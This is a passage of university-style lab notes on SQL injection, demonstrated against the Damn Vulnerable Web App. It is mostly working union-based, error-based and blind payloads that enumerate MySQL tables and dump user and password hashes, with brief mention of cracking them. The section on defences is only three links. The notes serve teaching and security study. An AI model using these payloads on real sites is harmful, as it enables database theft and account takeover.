malicious SQL code are inserted in a field that will be executed either by GET or by POST and
also by the server itself.
1.5 What can cause those injections?
Through this method, an unauthorized person will obtain access on the database of the website,
thus, the attacker gets access to all detailed information from the database.
4. 4
1.6 How can SQL injection affect the system administrators (root)?
Usually an error leads to another error and so on until a possible attacker succeeds to enter the
server and from there things drastically change so that, once a malicious file is uploaded on the
server, the attacker can control the website as well as the server.
1.7 How can SQL injection affect the website administrator?
The website administrator can loose access to the admin panel, the attacker can change the
password and modify the email from the database so that we can not recover the admin panel or
the website.
1.8 How can SQL injection affect the website users?
This is the worse part because once the website is already taken over, the website users will
receive from the administrator a notification which says that we must access unknown page with
malicious codes pretending to be something else, leading to the users also getting infected.
1.9 How can SQL injection affect the web page visitors?
Let us assume that the server was already compromised and the attacker modifies the webpage
structure and once the attacker enters the website, he can steal the cookies, infect other people
etc.
1.10 How can we do SQL injection?
We have the automated method with programs like sqlmap, mole, havij etc that are not very
efficient because they are using only predefined queries and so if the injection is complicated, it
won’t know what to do and it will quit, saying it is not vulnerable but instead it is. The second
method refers to manual injections that we will discuss in within this laboratory as well as other
possible types of attacks on a website in the following laboratories.
5. 5
2. Classification
To the present have been discovered 3 main methods of SQL injection and those are:
2.1 Union based
With this method we search the numbers of columns that the current table has and through
applying the following command we obtain certain “errors” that we can exploit in our favor:
union select 1,2,3,4,5,…(the number of columns that the current table has)
We can obtain information such as: PHP version, the user with which we try to make the SQL
queries (many times [person/website name]@localhost), database name, system user,
permissions from the server as well as any information from the database.
The commands for a custom query of union based (because everything we discuss here will be
made manually). I will show them in the next paragraph in which I will demonstrate a possible
attack on a server (in our case the internal server).
2.2 Error based
It is the second method of SQLi (SQL injection). Unlike union based, in this method we can
output only a single piece of information one time through a SQL error. Commands in error
based are quite complex so we can not memorize them by heart.
What I want you to remember is that by using union based or error based commands we will
output the same information but the difference is that one is quicker then other.
2.3 Blind based
The last technique in the series of SQLi “outputs” the information slower then the first two
because the number of queries may increase significantly according to the information from the
database.
The queries will be similar to the game true or false, if the query is correct then the server will
output the website normally and if it is false, then the server will output only parts of the website
I will make examples for each type in the next section: The possible scenario where I will
explain in detail every step that I will do to get to the wanted information from the database.
6. 6
3. Possible scenario
In this scenario I will use the Damn Vulnerable Web App (DVWA) that is a written in PHP.
This tool is created for teachers/students/or people that want to learn more about application
security in a class room environment. I will use it to prove the concept of SQL injection.
First of all when we have to start an injection of one of the 3 types, we need to close the query
such that the next sequence will execute like we want to!
If we want to see the sequence of code in real time we can add the following PHP code:
$html .= '<pre>' .$getid . '<br><pre>';
3.1 Types of SQL queries
3.1.1 String based
Suppose that we have the following sequence:
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id
= '$id'";
To execute commands we need to close the sequence correctly such that the code will get
executed correctly! How we do that? We try something simple '(single quote).
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''1''' at line 1
7. 7
What does this mean? It means that we have a MySQL database and why we get that error? Let
us understand better!
select first_name, last_name from users where user_id=''';
In the end of the sequence we put --+ (-- is a comment and + is for the type of string based
that represents a space).
(!!! It will also work with --+- or -- -.)
select first_name, last_name from users where user_id=''-- ';
When we find that id=1'--+ is working correctly, we can continue the injection.
3.1.2 Integer based
$getid = "SELECT first_name, last_name FROM users WHERE user_id
= $id";
We try like the last time '(single quote).
8. 8
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''' at line 1
If we put id=1'--+ we get the following error:
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''--' at line 1
This means we can no use string based! What does is happen when we take out the '?
id=1--+ or even id=1-- we see that it executes correctly the sequence and the page has no
errors or missing text.
select first_name, last_name from users where user_id=1--;
9. 9
3.1.3 Multiple types
The query could differ from the first 2 types presented before.
This means that it could close the query even with "--, ')--, )--, ))--, ")--, ")-
-, '))-- etc.
So it means that the query can be in multiple methods, the main idea is that only one will work!
Some examples of SQL queries:
select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")
3.2 Union based
The following methods are an example only for string based and integer based.
As the name itself says, this type of injection will use the command UNION from SQL that
combines the result of two or more SELECT statements like the following example:
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
We check the functionality of order by: How does order by work?
It is used for sorting the results obtained through SELECT.
SELECT column_name, column_name
FROM table_name
ORDER BY column_name ASC|DESC, column_name ASC|DESC;
order by 1 (if it works we try 2,3,….N, where N is the last number of the columns of the
actual table).
10. 10
Let us assume we reach 2 (order by 2).
I tried 2 and it worked, if I try order by 3 we obtain an error.
Unknown column '3' in 'order clause'
Why do we receive an error when we try order by? The table that we are using now has only 2
columns that used in the query.
Now we must use union select to inject the commands through we find the information in the
database.
union select 1,2
We do we write 1,2 instead of 1,2,3,4? Like I said before in our table we have only 2 columns
that will be used by the query:
SELECT first_name, last_name FROM users
We already know the table but we assume that we do not.
We obtain 1 and 2 – those are the vulnerable columns.
11. 11
(!!! If it does not output anything and we do not get any errors, we put the parameter with a
number that does not exist on the database, or we can deny it.)
For example:
id=1’ and 0 union select 1,2--+
id=1’ and 1=0 union select 1,2--+
id=-1’ union select 1,2--+
id=0’ union select 1,2--+
id=99999’ union select 1,2--+
We modify one of the outputted vulnerable columns to check the version of the running MySQL
server. The purpose is to identify the version of the DBMS to search for the eventual known
vulnerabilities for that version.
union select 1,version()
We get 5.6.24 – this version is in my example but on each server depends on the running
MySQL server. On CSIRT there are known/declared/registered vulnerabilities for every version
of MySQL DBMS. Those can be later exploited with the help of other techniques/instruments of
attack.
12. 12
We check the name of the database. The purpose is to get the current database where the
application runs.
union select 1,database()
We get the name of the database entitled: dvwa.
To obtain all the tables from the database with the purpose of identifying a table that can have a
possible administrator account.
We will use the following SQL commands to obtain all tables from the current database:
group_concat(table_name) – which we add in the place of the database()
13. 13
from information_schema.tables where table_schema=database() – which
we will add at the end of the SQL command:
union select 1,group_concat(table_name) from
information_schema.tables where table_schema=database()
How do the previous commands work?
group_concat() is a function that returns a string by concatenating the not null values of a
group. information_schema.tables is a function that carries all the existing tables from
the existing databases on the server. table_schema is a function that can be set with a
database name from where we want to get specific information.
We obtain guestbook and users. To extract information from users we need to modify the
command like this:
We modify table_name and replace it with column_name and at the end we will write
from information_schema.columns where table_name = 0x7573657273
Where 0x7573657273 are users transformed in the hexadecimal format – we use for
efficiency the add-on Hackbar from Firefox. We could have used users directly, but we are not
sure if the current SQL user can write or read the restricted files of the server.
We find user_id, first_name, last_name, user, password, avatar,
USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS.
14. 14
To output the information from the columns user and password” we have the following
command:
union select 1, group_concat(0x3c62723e,user,0x3a3a,password)
from users
Where 0x3c62723e is <br> in HTML.We receive the wanted information from the 2
columns (user and password) from the table users.
Let us assume we have the admin tables with the columns username and password. The
command will look like this:
union select 1,group_concat(username,0x0a,password),3 from admin
Executing the interrogation we will receive the admin account and the password!
If we look closely, we will see that the password is a hash encrypted, maybe with MD5 or SHA-
1 –> unidirectional hash. What does this mean? A password once encrypted it can not be
decrypted, this means is hard to break and so we can try dictionary attack, rainbow tables and/or
even brute-force attack.
15. 15
3.3 Error based
In his method, like I said before, we can output one piece of information at a time!
This means:
and(select 1 from(select count(*),concat((select (select
concat(version(),0x00)) from information_schema.tables limit
0,1),floor(rand(0)*2)) as x from information_schema.tables group
by x)a)
Duplicate entry '5.6.24' for key 'group_key'
If we wish to output the name of the database, we modify the version() with database().
and(select 1 from(select count(*),concat((select (select
concat(database(),0x00)) from information_schema.tables limit
0,1),floor(rand(0)*2)) as x from information_schema.tables group
by x)a)
If we want to reach the tables, we must change the query a little.
and(select 1 from(select count(*),concat((select (select (select
concat(table_name,0x00) from information_schema.tables where
table_schema=database() limit 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
16. 16
Duplicate entry '~guestbook' for key 'group_key'
To get to the next table we modify the increment the limit.
(!!! If the query works for limit 5,1 but not for limit 6,1 this means there are only 6
tables in that database. This rule works also for determining the number of columns or number of
records from a table.)
and(select 1 from(select count(*),concat((select (select (select
concat(table_name,0x00) from information_schema.tables where
table_schema=database() limit 1,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
When we try limit 2,1 we receive a valid web page without any errors this is because we try
to exploit the information from the database using SQL errors and this means that we already
know there are only 2 tables in the database named dvwa!
17. 17
We can see what columns are inside the table named users with the next query:
and(select 1 from(select count(*),concat((select (select (select
concat(column_name,0x00) from information_schema.columns where
table_name=0x7573657273 and table_schema=database() limit 0,1))
from information_schema.columns limit 0,1),floor(rand(0)*2))x
from information_schema.columns group by x)a)
Where 0x7573657273 = users
We continue to increment the limit of the columns to search for the user and password,
the same as union based.
limit 1,1
limit 2,1
And so on, depending on how many columns we want to get...
18. 18
and(select 1 from(select count(*),concat((select (select (select
concat(column_name,0x00) from information_schema.columns where
table_name=0x7573657273 and table_schema=database() limit 3,1))
from information_schema.columns limit 0,1),floor(rand(0)*2))x
from information_schema.columns group by x)a)
The query to obtain the first record from table users using the columns user and password
is:
and (select 1 from(select count(*),concat((select
concat(user,0x3a,password) from users limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)
For the next records we modify the limit as in the previously query!
limit 1,1
And so on, depending on how many records you want to get...
19. 19
3.4 Blind based
This method is very frequently met and it is very hard to exploit manually because of the time to
create the queries.
In the following, I will show you the method without doing it until the end, because it will need a
lot of time even for this small database!
To simply check if the blind based is present on the server, we can assume a truth condition like
id=1’ and 1=1--+ and if we will get the same page, this can be a blind based injection. To
be sure we will try and 1=0. If the page loads without some parts of the text because 1 is not
equal to 0 (and 1 is equal to 1), thus we will check if the server responses to our questions with
true or false (true if the page loads normally, false otherwise).
We will ask the server if he had DBMS version 4 (even that I know it is 5).
and substring(@@version,1,1)=4
20. 20
A part of the text disappears, now we will try with 5:
and substring(@@version,1,1)=5
It loads normally this means we have the version 5 on the DBMS.
If we want to get the information from the database we need to understand how the server will
answer to our queries.
If we want to get the tables, we first need to understand the ASCII table. Why do we need
ASCII? This is how blind based injection works: using the SQL ascii() function.
If the look on next page, on the ASCII table, we see that:
‘a’ = 97, ‘A’ = 65, ‘g’ = 103
And the examples can continue…
21. 21
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))>65
We want to know is the first letter of the first table name is grater then A (65 = ‘A’ in ascii).
We continue to add, until we get the following result:
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))<104
(110 = ‘n’)
22. 22
We almost found the first letter (even that we already know it from union based and error based,
table name is “guestbook”)
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))=103
For the next letter we see that u is 117 so we modify the query a little:
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),2,1))=117
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),3,1))=101
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),4,1))=115
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),5,1))=116
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),6,1))=98
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),7,1))=111
23. 23
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),8,1))=111
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),9,1))=107
Now we found “guestbook”, I won’t stay the same on getting the table ”users” that we already
know, the process in the same.
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
1,1),1,1))=117
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
1,1),2,1))=115
And so on until the end...
We know only the name of the table: users, without any other information. The next part comes
with a guess of columns, not 100% sure to guess the columns but for a learning purpose I already
know the columns.
We assume that we have the column username, so we will try to see if it exists.
and (SELECT substring(concat(1,username),1,1) from users limit
0,1)=1
It seems that username does not exist in table users.
and (SELECT substring(concat(1,user),1,1) from users limit
0,1)=1
24. 24
It works because the web page loads normally but what if we try password?
and (SELECT substring(concat(1,password),1,1) from users limit
0,1)=1
It works as well and now we need to find the first column of the table users (usually id or
user_id).
and (SELECT substring(concat(1,id),1,1) from users limit 0,1)=1
Unknown column 'id' in 'field list'
and (SELECT substring(concat(1,user_id),1,1) from users limit
0,1)=1
Now we need to find the administrator account and the password:
and ascii(substring((SELECT concat(user) from users where
user_id=1),1,1))=97
and ascii(substring((SELECT concat(user) from users where
user_id=1),2,1))= 100
and ascii(substring((SELECT concat(user) from users where
user_id=1),3,1))= 109
and ascii(substring((SELECT concat(user) from users where
user_id=1),4,1))= 105
and ascii(substring((SELECT concat(user) from users where
user_id=1),5,1))= 110
(admin = 97,100,109,105,110)
and ascii(substring((SELECT concat(password) from users where
user_id=1),1,1))=53
and ascii(substring((SELECT concat(password) from users where
user_id=1),2,1))=102
We continue to search until we find all the information in the password column.
25. 25
4. Methods of protection
http://php.net/manual/en/mysqli.quickstart.prepared-statements.php
http://php.net/manual/en/pdo.prepare.php
https://docs.oracle.com/javase/7/docs/api/java/sql/PreparedStatement.html
26. 26
5. Conclusions
As I said before in this course, this type of vulnerability is very easy to be exploited and exists on
many websites in present.
SQLi is part of web application vulnerabilities that can be exploited very easy on small websites
in which the developers are not prepared to protect their server, the web page and the
information from a possible attack of this type of vulnerability. However not all the small web
pages have this kind of vulnerability, it can be found also on many important websites from all
around the world.
A student said the following: “If we want to be protected from SQLi we need to se the parameter
on POST because if would not appear directly on the web page of in the browser URL.” To
clarify this problem, I asked the following: “Do you think this would be enough to protect you
from a possible attacker? Maybe if a script kiddie would try this, he would not succeed, but if an
experienced hacker would target your website he would most certainly penetrate your website.
(A script kiddie is a person with little knowledge about security that uses tools made by
experienced hackers to destroy websites or servers.)
Maybe something the Web Application Firewall would stop you from running some commands
like: union, select, union select, etc. but most certainly it can not protect you from new queries
made by people with experience in this domain.
As long as SQL will exist, SQLi will also exist!